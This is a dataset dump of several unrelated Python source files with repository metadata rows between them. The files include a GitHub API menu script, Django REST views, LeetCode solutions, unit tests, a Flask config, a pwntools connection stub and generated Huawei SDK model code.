# NOTE(review): every call below fires immediately at import/startup, before
# the user picks a menu option -- confirm this eager behaviour is intended.
user_details = requests.get(API_URL + "/user", headers=headers)
get_repos = requests.get(API_URL + "/user/repos", headers=headers)
create_repo = requests.post(API_URL + "/user/repos", data='{"name":"PreranaAgale"}', headers=headers)
get_projects = requests.get(API_URL + "/users/preranaagale/projects", headers=headers)
#delete_repo = requests.delete(API_URL + "/repos/preranaagale/PreranaAgale123", headers=headers)
update_repo = requests.patch(API_URL + "/repos/prerana-agale/Testing_1", data='{"name":"New Demo"}', headers=headers)
create_project = requests.post(API_URL + "/user/projects", data='{"name":"Prerana"}', headers=headers)
update_project = requests.patch(API_URL + "/projects/5768902", data='{"name":"Testing"}', headers=headers)
proj_in_repo = requests.post(API_URL+"/repos/prerana-agale/Testing/projects", data='{"name":"New Demo"}', headers=headers)

print(
    "\n1.Get user details\n2.Get repos\n3.create Repo\n4.Update Rpo\n5.Delete Repo\n6.Get projects\n7.Create "
    "project\n8.Update project\n9. Create Project In Repo")

# Simple menu loop: 0 exits, 1-9 pretty-print the corresponding response.
while True:
    num = int(input("\n\nEnter your choice (or 0 to quit):"))
    if num == 0:
        break
    elif num == 1:
        pprint(user_details.json())
    elif num == 2:
        pprint(get_repos.json())
    elif num == 3:
        pprint(create_repo.json())
    elif num == 4:
        pprint(update_repo.json())
    elif num == 5:
        try:
            response = requests.delete(API_URL + "/repos/preranaagale/New-Demo12344", headers=headers)
        except requests.RequestException:
            # Fixed: a bare `except:` here also swallowed KeyboardInterrupt
            # and SystemExit; only network/HTTP errors should be handled.
            print("Cannot delete repo!!")
        else:
            print(response.text)
    elif num == 6:
        pprint(get_projects.json())
    elif num == 7:
        pprint(create_project.json())
    elif num == 8:
        pprint(update_project.json())
    elif num == 9:
        pprint(proj_in_repo.json())
    else:
        print("enter correct option:")
| [
"Prerana.Agale@blueconchtech.com"
] | Prerana.Agale@blueconchtech.com |
7cf3f299b8843e75852a43bf7620ada06c806026 | 1439bf1f4127331306aa9abc2153170073b3f171 | /src/catalog/views.py | 0f27b4f3e01f844e3af061d98ad5a077a0a158e3 | [
"MIT"
] | permissive | xgerinx/skillsitev2 | 6c6ac7bfdfc19dea46ea8a57498a12d1a9120a1b | 860d1c1214de125346c0accc4ec4b8953297231b | refs/heads/master | 2023-08-25T05:57:04.704007 | 2021-10-26T09:41:20 | 2021-10-26T09:41:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,712 | py | from rest_framework.generics import RetrieveAPIView, ListAPIView, get_object_or_404
from rest_framework import status
from rest_framework.response import Response
from rest_framework.permissions import AllowAny
from rest_framework_simplejwt.authentication import JWTAuthentication
from rest_framework.viewsets import GenericViewSet
from rest_framework.mixins import RetrieveModelMixin
from .models import Module, Course, Categorie, Lesson
from .serializers import (ModuleInfoSerializer, CourseInfoSerializer, CategorySerializer, LessonSerializer)
from skill.utils import get_country
class URetrieveAPIView(RetrieveAPIView):
    """RetrieveAPIView whose serializer context also carries the requesting
    user (when JWT-authenticated), their country, and the `mnemo` URL kwarg."""

    def get_user(self):
        """Return the JWT-authenticated user, or None without valid credentials."""
        auth_result = JWTAuthentication().authenticate(self.request)
        if auth_result is None:
            return None
        user, _token = auth_result
        return user

    def get_serializer_context(self):
        """Extend the default serializer context with country, user and mnemo."""
        country = get_country(self.request)
        context = super().get_serializer_context()
        context.update({
            'country': country,
            'user': self.get_user(),
            'mnemo': self.kwargs['mnemo'],
        })
        return context
class ModuleDetailViewSet(URetrieveAPIView, RetrieveModelMixin, GenericViewSet):
    """Public read-only endpoint: retrieve one Module by its `mnemo` slug."""
    queryset = Module.objects.all()
    serializer_class = ModuleInfoSerializer
    permission_classes = (AllowAny,)
    lookup_field = 'mnemo'
class CourseInfoViewSet(URetrieveAPIView, RetrieveModelMixin, GenericViewSet):
    """Public read-only endpoint: retrieve one Course by its `mnemo` slug."""
    queryset = Course.objects.all()
    serializer_class = CourseInfoSerializer
    permission_classes = (AllowAny,)
    lookup_field = 'mnemo'
class CategoriesListAPIView(ListAPIView):
    """Public endpoint listing every Categorie."""
    queryset = Categorie.objects.all()
    serializer_class = CategorySerializer
    permission_classes = (AllowAny,)
class ModuleLessonsViewSet(URetrieveAPIView, RetrieveModelMixin, GenericViewSet):
    """
    Return all Lessons related to Module and check user for payment.
    """
    queryset = Lesson.objects.all()
    serializer_class = LessonSerializer
    def get_queryset(self):
        # Restrict lessons to the module addressed by the URL's module_mnemo
        # (404 when no such module exists).
        return super().get_queryset().filter(section__module=get_object_or_404(Module, mnemo=self.kwargs['module_mnemo']))
    def retrieve(self, request, *args, **kwargs):
        # Only users who purchased this module may read its lessons.
        if self.request.user.profile.purchased_modules.filter(mnemo=self.kwargs['module_mnemo']):
            return super().retrieve(request, *args, **kwargs)
        else:
            # 402 tells the client that payment is required first.
            return Response(status=status.HTTP_402_PAYMENT_REQUIRED)
| [
"xi.forwork.ix@gmail.com"
] | xi.forwork.ix@gmail.com |
9ea9323c06957ea63a4699fe72b9431a47cd9117 | e35fd52fe4367320024a26f2ee357755b5d5f4bd | /leetcode/problems/313.super-ugly-number.py | 704a9e40a9a97991c2693e51d1623cb6c3511bc7 | [] | no_license | liseyko/CtCI | a451967b0a0ce108c491d30b81e88d20ad84d2cd | c27f19fac14b4acef8c631ad5569e1a5c29e9e1f | refs/heads/master | 2020-03-21T14:28:47.621481 | 2019-11-12T22:59:07 | 2019-11-12T22:59:07 | 138,658,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,017 | py | #
# @lc app=leetcode id=313 lang=python3
#
# [313] Super Ugly Number
#
# https://leetcode.com/problems/super-ugly-number/description/
#
# algorithms
# Medium (43.02%)
# Total Accepted: 67.2K
# Total Submissions: 156.3K
# Testcase Example: '12\n[2,7,13,19]'
#
# Write a program to find the n^th super ugly number.
#
# Super ugly numbers are positive numbers whose all prime factors are in the
# given prime list primes of size k.
#
# Example:
#
#
# Input: n = 12, primes = [2,7,13,19]
# Output: 32
# Explanation: [1,2,4,7,8,13,14,16,19,26,28,32] is the sequence of the first
# 12
# super ugly numbers given primes = [2,7,13,19] of size 4.
#
# Note:
#
#
# 1 is a super ugly number for any given primes.
# The given numbers in primes are in ascending order.
# 0 < k ≤ 100, 0 < n ≤ 10^6, 0 < primes[i] < 1000.
# The n^th super ugly number is guaranteed to fit in a 32-bit signed integer.
#
#
#
class Solution:
    def nthSuperUglyNumber(self, n: int, primes: List[int]) -> int:
        """Return the n-th super ugly number (1-indexed; the first is 1).

        A super ugly number has all of its prime factors in ``primes``.
        Implemented with the k-pointer dynamic programme (the original stub
        had no body at all): each prime keeps an index into the growing
        `ugly` list marking the smallest multiple it can still contribute.
        O(n * k) time, O(n + k) space.
        """
        ugly = [1]
        idx = [0] * len(primes)        # per-prime pointer into `ugly`
        candidates = list(primes)      # next candidate value per prime
        while len(ugly) < n:
            nxt = min(candidates)
            ugly.append(nxt)
            # Advance every prime whose candidate was chosen; this also
            # skips duplicates such as 2*7 == 7*2.
            for i, p in enumerate(primes):
                if candidates[i] == nxt:
                    idx[i] += 1
                    candidates[i] = p * ugly[idx[i]]
        return ugly[n - 1]
| [
"liseyko@gmail.com"
] | liseyko@gmail.com |
de49b4fb64c81096e931547635d5aad4087c37b0 | ba9267a02d30f00ede218c238408d3a0833e9b90 | /9.chapter/09_12_pr.py | 736768e808e78a8cf153bef9e3d9c88632fc2b6d | [] | no_license | Niraj-Suryavanshi/Python-Basic-Program | dae6a89eb25fda8a8780e97b8e291c24db5ddbeb | 7e01210a547b9e0c78bd747abd9ae8ccc519dd37 | refs/heads/main | 2023-08-11T05:59:06.770332 | 2021-09-14T18:58:24 | 2021-09-14T18:58:24 | 406,478,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 100 | py | with open("this.txt")as f:
content=f.read()
# Write the text captured above back out to copy.txt (simple file copy).
with open("copy.txt","w")as f:
    f.write(content)
"nirajsuryavanshi561@gmail.com"
] | nirajsuryavanshi561@gmail.com |
6c87426b542d1abe69697bbadc042bbe7343942b | ee4ecc3c526322dc42c2d2bcf6a9982694da5d69 | /other/clrs/14/03/07.test.py | b349eec398176b98a6e752fb0837a12aba2c2153 | [] | no_license | skanev/playground | 77d0f35a7e932021c9da8ce4f9095be9ac8a5c1e | 07b88d789391e34d71a74722b0b42b328b1f3c62 | refs/heads/master | 2023-04-15T14:07:42.719874 | 2022-12-20T09:12:00 | 2022-12-20T09:12:16 | 191,557 | 212 | 108 | null | 2023-04-12T05:33:25 | 2009-05-03T16:41:17 | Scheme | UTF-8 | Python | false | false | 1,698 | py | import unittest
import random
from os import path
filename = path.join(path.dirname(__file__), '07.py')
exec(open(filename).read())
def overlapper(rectangles):
    """Brute-force check: return the first rectangle that overlaps any
    rectangle appearing after it in the list, or None when no pair overlaps."""
    for i, candidate in enumerate(rectangles[:-1]):
        if any(other.overlaps(candidate) for other in rectangles[i + 1:]):
            return candidate
    return None
class OverlapingRectanglesTest(unittest.TestCase):
    """Tests for `overlap` (loaded from 07.py via the exec above), using the
    brute-force `overlapper` as the trusted reference implementation."""
    def test_simple_cases(self):
        # A disjoint pair must report no overlap; an intersecting pair must.
        self.assertFalse(
            overlap([
                Rectangle(left=0, right=10, top=0, bottom=10),
                Rectangle(left=20, right=30, top=0, bottom=10),
            ])
        )
        self.assertTrue(
            overlap([
                Rectangle(left=0, right=10, top=0, bottom=10),
                Rectangle(left=5, right=15, top=5, bottom=15),
            ])
        )
    def test_randomly_generated(self):
        # Build n random rectangles with sides up to m inside an s x s box.
        n = 100
        s = 1000
        m = 150
        rectangles = []
        for i in range(0, n):
            left = random.randint(0, s - 2)
            right = random.randint(left + 1, min(s, left + m))
            top = random.randint(0, s - 2)
            bottom = random.randint(top + 1, min(s, top + m))
            rectangle = Rectangle(left=left, right=right, top=top, bottom=bottom)
            rectangles.append(rectangle)
        # Repeatedly remove one overlapping rectangle (found by the brute
        # force) until none overlap; `overlap` must agree at every step.
        while target := overlapper(rectangles):
            self.assertTrue(overlap(rectangles))
            rectangles.remove(target)
        self.assertFalse(overlap(rectangles))
        # With all overlaps eliminated, every shrinking suffix of the
        # shuffled list must still report no overlap.
        random.shuffle(rectangles)
        while len(rectangles):
            self.assertFalse(overlap(rectangles))
            rectangles.pop()
if __name__ == '__main__':
unittest.main()
| [
"stefan.kanev@gmail.com"
] | stefan.kanev@gmail.com |
5f23d9830b94d4b6209d4050700114bf38faa25c | de5001910545361f1443ab6743131f1035dc4aee | /Numpy/01_N-dimen.py | 9c80ee73f7866cd9b5d6c2e7cea1bc0210b95a68 | [] | no_license | DucThanh1997/Khoa_luan | 04c2a4a4b408f43eeb9a18f2519186de887a619b | fcaef88f22f393078eb8e1bebf134c4916d3b40e | refs/heads/master | 2022-11-29T23:02:47.528585 | 2019-12-31T14:55:26 | 2019-12-31T14:55:26 | 186,123,267 | 0 | 1 | null | 2022-11-28T15:58:12 | 2019-05-11T11:14:34 | Python | UTF-8 | Python | false | false | 1,355 | py | import numpy as np
# Demo of basic NumPy indexing, array attributes and library constants.
# Fixed: np.Inf, np.NAN, np.NINF, np.NZERO and np.PZERO were removed in
# NumPy 2.0 (NEP 52); the canonical spellings below print the same values.
x = np.array([[1, 2, 3], [4, 5, 6]], np.int16)
print("mảng x: ", x)
print("\n")
print("in cột 2 của x: ", x[:, 1])
print("\n")
print("in dòng 1 của x: ", x[0, :])
print("\n")
print("\n")
y = np.array([[[1, 2, 3], [4, 5, 6]], [[-1, -2, -3], [-4, -5, -6]]], np.int16)
print("mảng 2 chiều y : ", y)
print("\n")
print("in ra phần tử thứ nhất trong dòng thứ nhất ở mảng thứ nhất của y:", y[0, 0, 0])
print("\n")
print("in ra ở cả 2 mảng dòng 2 côt 3 của y: ", y[:, 1, 2])
print("\n")
print("số mảng, số dòng, số cột của y: ", y.shape)
print("\n")
print("in ra số cột của y:", y.ndim)
print("\n")
print("in ra kiểu dữ liệu của y:", y.dtype)
print("\n")
print("mảng np có thể được coi là 1 ma trận nên chúng ta có thể đảo chiều x từ 2 dòng 3 cột thành 3 dòng 2 cột: ", x.T)
print("\n")
print("\n")
print("In ra các giá trị mặc định")
print("Dương vô cùng:", np.inf)
print("\n")
print("Not a number:", np.nan)
print("\n")
print("âm vô cùng:", -np.inf)
print("\n")
print("âm 0: ", -0.0)
print("\n")
print("dương 0: ", 0.0)
print("\n")
print("số e: ", np.e)
print("\n")
print("euler: ", np.euler_gamma)
print("\n")
print("số pi: ", np.pi)
| [
"noreply@github.com"
] | DucThanh1997.noreply@github.com |
e04ef3b1cbd752b86f154186d48662ed0bc3505e | 4565e949c16af3e11d8b0fcbe737971974162988 | /app1.py | 26256d04febf96fd6d1e16feffc76e32629aa2d6 | [] | no_license | Kappalize/git-github | 69a4165de6e1d23aa445b848e1894fa19860de97 | f1085b10f03eff66c3bcc2eb003cd8dda19a18c0 | refs/heads/master | 2020-04-22T13:11:35.211188 | 2019-03-07T03:30:02 | 2019-03-07T03:30:02 | 170,400,583 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 201 | py |
def main():
namibia()
angola()
def namibia():
bird = 5000
print(f'Namibia has {bird} bird.')
def angola():
bird = 3000
print('Angola has {bird} bird.')
main()
| [
"noreply@github.com"
] | Kappalize.noreply@github.com |
8f146c6797bd36f47f97f9b1f2f25369e0da9fe9 | 976e242dcebfa105b406784c94be70b631f0b9d2 | /pwnable.kr/starcraft/solve.py | 19074356ac460432c79fed64e331ce3c10f1df08 | [] | no_license | whszzzzzz/ctfwriteup | 7ef9f239211e17140e156ad168a788c36c2a339e | 8fab747c2eafa8874c446c3add9c10769af85c99 | refs/heads/master | 2021-06-19T15:10:28.159827 | 2017-07-07T07:54:44 | 2017-07-07T07:54:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 67 | py | from pwn import *
# Open a pwntools TCP connection to the challenge service.
s = remote('192.168.0.85',1234)
# Hand the socket to the user for manual interaction.
s.interactive()
| [
"mashirogod@gmail.com"
] | mashirogod@gmail.com |
1a6408cf2bf15c07c9977aa6de6ea73d2bf257f7 | 289559fe935ca8f0437854c7cc55b2bcd81f3e09 | /config.py | 0a6e5ff4b04f60d99951d65790fbc38a641aac01 | [] | no_license | aSimonSheng/origin | 4463ffbb29134f081f94749d38d300256b60562c | 0a89a57171f6bd6b248db1afe5db287f791ff4bb | refs/heads/master | 2020-03-19T19:33:36.691073 | 2018-06-19T12:53:07 | 2018-06-19T12:53:07 | 136,862,965 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,028 | py | # -*-coding:utf-8-*-
import redis
import logging
class Config(object):
    """Base Flask configuration shared by all run modes."""
    # General settings
    DEBUG = True
    SECRET_KEY = 'akdjhaidiagdgag'
    # Database settings
    SQLALCHEMY_DATABASE_URI = 'mysql://root:mysql@192.168.223.141:3306/information'
    SQLALCHEMY_TRACK_MODIFICATIONS = False
    SQLALCHEMY_COMMIT_ON_TEARDOWN = True
    # Redis settings (name kept as REDIS_POST -- sic -- for existing references)
    REDIS_HOST = '127.0.0.1'
    REDIS_POST = 6379
    # Session settings: store sessions in Redis with a signed session id
    SESSION_TYPE = 'redis'
    SESSION_USE_SIGNER = True  # sign the stored session id (SECRET_KEY is the key)
    SESSION_REDIS = redis.StrictRedis(REDIS_HOST, REDIS_POST)
    PERMANENT_SESSION_LIFETIME = 3600*24*2  # session lifetime: two days
    # Log output level
    LEVEL = logging.DEBUG
# 开发模式
class DeveloperConfig(Config):
    """Development mode: inherits the debug-friendly base defaults."""
    pass
# 生产模式
class ProductConfig(Config):
    """Production mode: debugging off, only errors logged."""
    # Removed a redundant trailing `pass`: it is only needed for an
    # otherwise-empty body and was dead code after these attributes.
    DEBUG = False
    LEVEL = logging.ERROR
#测试模式
class TestingConfig(Config):
    """Testing mode: currently identical to the base configuration."""
    pass
config_dict = {
'develop':DeveloperConfig,
'product':ProductConfig,
'testing':TestingConfig
} | [
"aSimonSheng@outlook.com"
] | aSimonSheng@outlook.com |
afb53abd9153e5aa6e56688b5411afd6c282a5ab | 4c617db46fb3eeb80a9acd9549d59307929a74dd | /test.py | 8e446be3ec2c0cb205a4de57a2912a65913bfe63 | [] | no_license | mAzurkovic/PyElements | 79e0c771311b56254083531f1bf6223a4ce8d4b5 | e8f5276bc1059e3a070e94cf97894330ca23625d | refs/heads/master | 2020-12-25T16:25:03.895084 | 2016-08-05T17:51:40 | 2016-08-05T17:51:40 | 40,604,909 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 70 | py | import pyelements as elements
# Fixed: `print elements.get_by_name(...)` is a Python 2 print statement and
# a syntax error under Python 3; the call form prints the same output on both.
print(elements.get_by_name("Hydrogen"))
| [
"mattias@zurkovic.com"
] | mattias@zurkovic.com |
ee247b71130125baa5f05f0fafa6ddf3753e5211 | 49e8d7b7075a4676c012d9ecf71dc978bd8f3174 | /Competitive/Day14/constructBSTfromPreoreder.py | c120b05b28f01eb4877220cb5cde32ecef9c0b91 | [] | no_license | eban12/compettitive_programing-cs478- | 3e06011ffb86172995dc69124832e0f69c85544e | 0c0f2e77a4ae989bbf249618bc11825561e9bc1c | refs/heads/master | 2021-07-13T05:34:02.988023 | 2020-12-02T12:11:26 | 2020-12-02T12:11:26 | 225,411,991 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 596 | py | # Definition for a binary tree node.
class TreeNode:
    """A binary-tree node: a stored value plus optional left/right children."""

    def __init__(self, x):
        # Children start out absent; callers attach subtrees afterwards.
        self.val = x
        self.left = self.right = None
def bstFromPreorder(preorder: List[int]) -> TreeNode:
    """Rebuild a binary search tree from its preorder traversal.

    The first value is the root; the remaining values smaller than it form
    the left subtree's preorder and the rest form the right subtree's.

    Args:
        preorder: preorder traversal of a BST.

    Returns:
        Root of the reconstructed BST, or None for empty input.
    """
    if not preorder:
        return None
    root_val = preorder[0]
    left = [v for v in preorder[1:] if v < root_val]
    right = [v for v in preorder[1:] if v >= root_val]
    root = TreeNode(root_val)
    # Fixed: the original recursed via `self.bstFromPreorder(...)` although
    # this is a module-level function, which raised NameError at runtime;
    # recurse directly (an empty sublist simply yields None).
    root.left = bstFromPreorder(left)
    root.right = bstFromPreorder(right)
    return root
"noreply@github.com"
] | eban12.noreply@github.com |
81f2637a8ed5c8510fcc5945d5235d911e45462f | 7c68212791621363da7f007b1ef449597937d20c | /day_1/operator_shorthand.py | 7070ebe9f8fe49ba7490762189795e3db53c65f3 | [
"MIT"
] | permissive | anishLearnsToCode/python-workshop-8 | c1ad5c2f06b435b612acc28544180b47c86fb24f | 0f64bfa7cf175283181b6e7f51a5e3b80d4b6b60 | refs/heads/main | 2023-02-07T11:55:48.372944 | 2021-01-03T08:41:33 | 2021-01-03T08:41:33 | 325,730,441 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 184 | py | # variable [operator]= var_2 / value
# i = i + 1 --> i += 1
# result = result + i --> result += i
# var /= 5 --> var = var / 5
# i *= 3 --> i = i * 3
# prod %= 10 --> prod = prod % 10
| [
"anish_@outlook.com"
] | anish_@outlook.com |
33fbb86f0c1d4774178156a30d673684559ba579 | ced56909016fb7c2175c3911fc8481bd5fdf0800 | /pytext/metric_reporters/disjoint_multitask_metric_reporter.py | 83d419bc152137138df46faa0ff3715e14e05512 | [
"BSD-3-Clause"
] | permissive | coderbyr/pytext | e258a3aae625e6a2fd386b60f25ac44a7b4149fe | 72c1ad835a30bef425494b02a6210f2e3232b1a4 | refs/heads/master | 2022-11-20T09:11:44.991716 | 2020-07-20T22:05:42 | 2020-07-20T22:07:15 | 281,286,078 | 1 | 0 | NOASSERTION | 2020-07-21T03:32:42 | 2020-07-21T03:32:41 | null | UTF-8 | Python | false | false | 4,013 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from typing import Dict, Optional
from pytext.common.constants import BatchContext
from .metric_reporter import MetricReporter
AVRG_LOSS = "_avrg_loss"
class DisjointMultitaskMetricReporter(MetricReporter):
    # Model-selection values from this reporter are "higher is better".
    lower_is_better = False
    class Config(MetricReporter.Config):
        # When True and no target task is configured, best-epoch selection
        # sums each sub-task's own selection metric instead of using the
        # average training loss.
        use_subtask_select_metric: bool = False
    def __init__(
        self,
        reporters: Dict[str, MetricReporter],
        loss_weights: Dict[str, float],
        target_task_name: Optional[str],
        use_subtask_select_metric: bool,
    ) -> None:
        """Aggregate per-task metric reporters for disjoint multitask training.

        Args:
            reporters (Dict[str, MetricReporter]):
                Dictionary of sub-task metric-reporters keyed by task name.
            loss_weights (Dict[str, float]):
                Per-task loss weights applied by DisjointMultitaskModel;
                used here only to undo the weighting when reporting.
            target_task_name (Optional[str]):
                Dev metric for this task will be used to select best epoch;
                falls back to "" (no target task) when None.
            use_subtask_select_metric (bool):
                With no target task, select the best epoch by summing every
                sub-task's model-selection metric instead of using the
                average training loss.
        """
        super().__init__(None)
        self.reporters = reporters
        self.target_task_name = target_task_name or ""
        self.target_reporter = self.reporters.get(self.target_task_name, None)
        self.loss_weights = loss_weights
        self.use_subtask_select_metric = use_subtask_select_metric
def _reset(self):
self.total_loss = 0
self.num_batches = 0
def batch_context(self, raw_batch, batch):
context = {BatchContext.TASK_NAME: batch[BatchContext.TASK_NAME]}
reporter = self.reporters[context[BatchContext.TASK_NAME]]
context.update(reporter.batch_context(raw_batch, batch))
return context
def add_batch_stats(
self, n_batches, preds, targets, scores, loss, m_input, **context
):
self.total_loss += loss
self.num_batches += 1
# losses are weighted in DisjointMultitaskModel. Here we undo the
# weighting for proper reporting.
if self.loss_weights[context[BatchContext.TASK_NAME]] != 0:
loss /= self.loss_weights[context[BatchContext.TASK_NAME]]
reporter = self.reporters[context[BatchContext.TASK_NAME]]
reporter.add_batch_stats(
n_batches, preds, targets, scores, loss, m_input, **context
)
def add_channel(self, channel):
for reporter in self.reporters.values():
reporter.add_channel(channel)
def report_metric(
self,
model,
stage,
epoch,
reset=True,
print_to_channels=True,
optimizer=None,
privacy_engine=None,
):
metrics_dict = {AVRG_LOSS: self.total_loss / self.num_batches}
for name, reporter in self.reporters.items():
print(f"Reporting on task: {name}")
metrics_dict[name] = reporter.report_metric(
model, stage, epoch, reset, print_to_channels, optimizer=optimizer
)
if reset:
self._reset()
if self.target_reporter:
return metrics_dict[self.target_task_name]
for name, reporter in self.reporters.items():
metrics_dict[name] = reporter.get_model_select_metric(metrics_dict[name])
return metrics_dict
def get_model_select_metric(self, metrics):
if self.target_reporter:
metric = self.target_reporter.get_model_select_metric(metrics)
if self.target_reporter.lower_is_better:
metric = -metric
elif self.use_subtask_select_metric:
metric = 0.0
for name, reporter in self.reporters.items():
sub_metric = metrics[name]
if reporter.lower_is_better:
sub_metric = -sub_metric
metric += sub_metric
else: # default to training loss
metric = -metrics[AVRG_LOSS]
return metric
def report_realtime_metric(self, stage):
for _, reporter in self.reporters.items():
reporter.report_realtime_metric(stage)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
b05b3a6a6396536b1612af4847b1d785dc4f0807 | 764aee352f4f9d6b4c30f01f1d00c4d2d58c4f39 | /venv/bin/chardetect | 18def21d0c4a41fc745b7faedb0b6e10c7ed2b74 | [] | no_license | swsachith/dataAPI-flask | 6d2866dc812cb630ce25ab996071399decedadb1 | fe33f8b75374d5e5ae3606f27a2a1a9751b3ce5d | refs/heads/master | 2021-06-11T23:51:43.744532 | 2021-05-25T15:54:50 | 2021-05-25T15:54:50 | 153,512,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | #!/Users/swithana/git/imls/dataAPI-python/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
    # Strip the setuptools wrapper suffix ("-script.py"/".exe") from argv[0]
    # so usage/help output shows the bare command name, then run the CLI;
    # its return value becomes the process exit status.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"swsachith@gmail.com"
] | swsachith@gmail.com | |
14c865664a58431c88b01845092d21e804f2e15a | b999989d482489912af19903e0346ada046d8995 | /python/broadinstitute_cmap/clue_api_client/test_macchiato_queries.py | a842ce02b25af177118e68d7ad9711eb3ca4b503 | [
"BSD-3-Clause"
] | permissive | zhaoli2017/l1ktools | 979c6a238e2c81ea013b8eddc141008a8c95f3c1 | 6e9c89cf3a8e8d14f2b495932ae04a454ea5eb68 | refs/heads/master | 2021-01-19T21:20:16.562481 | 2017-03-27T22:48:26 | 2017-03-27T22:48:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,156 | py | import unittest
import setup_logger
import logging
import test_clue_api_client
import macchiato_queries as mq
__authors__ = "David L. Lahr"
__email__ = "dlahr@broadinstitute.org"
logger = logging.getLogger(setup_logger.LOGGER_NAME)
cao = None
test_brew_prefix = "test_brew_prefix_for_test_macchiato_queries"
test_status = "test macchiato status for test_macchiato_queries"
class TestMacchiatoQueries(unittest.TestCase):
    """Integration tests for macchiato_queries, run against a clue API
    client (`cao`, a module global initialized in the __main__ block)."""
    def setUp(self):
        # Ensure the shared test entry exists before every test so lookups
        # by test_brew_prefix succeed.
        test_clue_api_client.add_entry_if_not_already_present(cao, mq.resource_name,
            {"brew_prefix":test_brew_prefix}, {"brew_prefix":test_brew_prefix, "status": test_status})
    def test_is_brew_prefix_in_api(self):
        # Known prefix (created in setUp) is found ...
        r = mq.is_brew_prefix_in_api(cao, test_brew_prefix)
        self.assertTrue(r)
        # ... and a bogus prefix is not.
        r = mq.is_brew_prefix_in_api(cao, "Dave Lahr's fake brew prefix that hopefully will never exist in the API")
        self.assertFalse(r)
    def test_get_api_id(self):
        # The API id of the shared entry resolves to something non-None.
        r = mq.get_api_id(cao, test_brew_prefix)
        self.assertIsNotNone(r)
        logger.debug("r: {}".format(r))
    def test_change_status(self):
        # Look up the entry's id, change its status, and verify the API
        # echoes the new status back.
        cur_id = mq.get_api_id(cao, test_brew_prefix)
        expected_new_status = "test status for test_macchiato_queries TestMacchiatoQueries.test_change_status"
        r = mq.change_status(cao, cur_id, expected_new_status)
        self.assertIsNotNone(r)
        logger.debug("r: {}".format(r))
        self.assertIn("status", r)
        self.assertEqual(expected_new_status, r["status"])
    def test_create_brew_prefix_in_api(self):
        #happy path
        expected_brew_prefix = "brew_prefix for TestMacchiatoQueries.test_create_brew_prefix_in_api"
        r = mq.create_brew_prefix_in_api(cao, expected_brew_prefix, status=test_status)
        self.assertIsNotNone(r)
        logger.debug("r: {}".format(r))
        self.assertIn("id", r)
        self.assertIsNotNone(r["id"])
        #cleanup by deleting created entry
        cao.run_delete(mq.resource_name, r["id"])
if __name__ == "__main__":
setup_logger.setup(verbose=True)
cao = test_clue_api_client.build_clue_api_client_from_default_test_config()
unittest.main() | [
"dlahr@broadinstitute.org"
] | dlahr@broadinstitute.org |
a566a7e2e4d20ec72b89062af4c532ed1123f14f | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-hss/huaweicloudsdkhss/v5/model/list_port_statistics_response.py | 13b10f29de59c0c0d34e2530004b515adf013fcb | [
"Apache-2.0"
] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 4,349 | py | # coding: utf-8
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ListPortStatisticsResponse(SdkResponse):
    """Generated response model for the HSS ``ListPortStatistics`` API.

    Attributes:
        openapi_types (dict): maps attribute name to attribute type.
        attribute_map (dict): maps attribute name to its JSON key.
    """
    # Attribute names listed here are masked as "****" by to_dict().
    sensitive_list = []
    openapi_types = {
        'total_num': 'int',
        'data_list': 'list[PortStatisticResponseInfo]'
    }
    attribute_map = {
        'total_num': 'total_num',
        'data_list': 'data_list'
    }
    def __init__(self, total_num=None, data_list=None):
        """ListPortStatisticsResponse

        The model defined in huaweicloud sdk

        :param total_num: Total number of open ports
        :type total_num: int
        :param data_list: List of open-port statistics entries
        :type data_list: list[:class:`huaweicloudsdkhss.v5.PortStatisticResponseInfo`]
        """
        super(ListPortStatisticsResponse, self).__init__()
        self._total_num = None
        self._data_list = None
        self.discriminator = None
        # Only overwrite the backing fields when a value was supplied.
        if total_num is not None:
            self.total_num = total_num
        if data_list is not None:
            self.data_list = data_list
    @property
    def total_num(self):
        """Gets the total_num of this ListPortStatisticsResponse.

        Total number of open ports.

        :return: The total_num of this ListPortStatisticsResponse.
        :rtype: int
        """
        return self._total_num
    @total_num.setter
    def total_num(self, total_num):
        """Sets the total_num of this ListPortStatisticsResponse.

        Total number of open ports.

        :param total_num: The total_num of this ListPortStatisticsResponse.
        :type total_num: int
        """
        self._total_num = total_num
    @property
    def data_list(self):
        """Gets the data_list of this ListPortStatisticsResponse.

        List of open-port statistics entries.

        :return: The data_list of this ListPortStatisticsResponse.
        :rtype: list[:class:`huaweicloudsdkhss.v5.PortStatisticResponseInfo`]
        """
        return self._data_list
    @data_list.setter
    def data_list(self, data_list):
        """Sets the data_list of this ListPortStatisticsResponse.

        List of open-port statistics entries.

        :param data_list: The data_list of this ListPortStatisticsResponse.
        :type data_list: list[:class:`huaweicloudsdkhss.v5.PortStatisticResponseInfo`]
        """
        self._data_list = data_list
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        # Walk the declared attributes, recursively dict-ifying nested
